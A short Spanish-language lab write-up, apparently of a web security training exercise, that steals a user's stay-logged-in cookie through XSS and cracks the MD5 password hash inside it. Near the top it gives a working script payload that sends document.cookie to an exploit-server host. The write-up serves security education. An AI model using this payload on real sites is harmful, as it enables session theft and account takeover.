Offline password cracking

20250805010651.png
<script>document.location='//YOUR-EXPLOIT-SERVER-ID.exploit-server.net/'+document.cookie</script>

Cuando ingresamos y seleccionamos la opción de stay logged in observamos que este nos da una cookie el cual esta encodeada en base64 en el cual tiene el nombre del usuario wiener y la contraseña del usuario en md5

20250805014609.png

Luego de investigar el sitio web, observaremos que el sitio web es propenso a una xss

20250805015057.png

Explotaremos xss para robar la cookie del usuario carlos

Luego debemos ir a los logs del servidor del atacante veremos la solicitud

20250805015112.png

Ahora tenemos la cookie del usuario carlos, para ello debemos crackaerla y obtener la contraseña en texto plano

Para crackear el hash en md5 usaremos crackstation

20250805015427.png

Last updated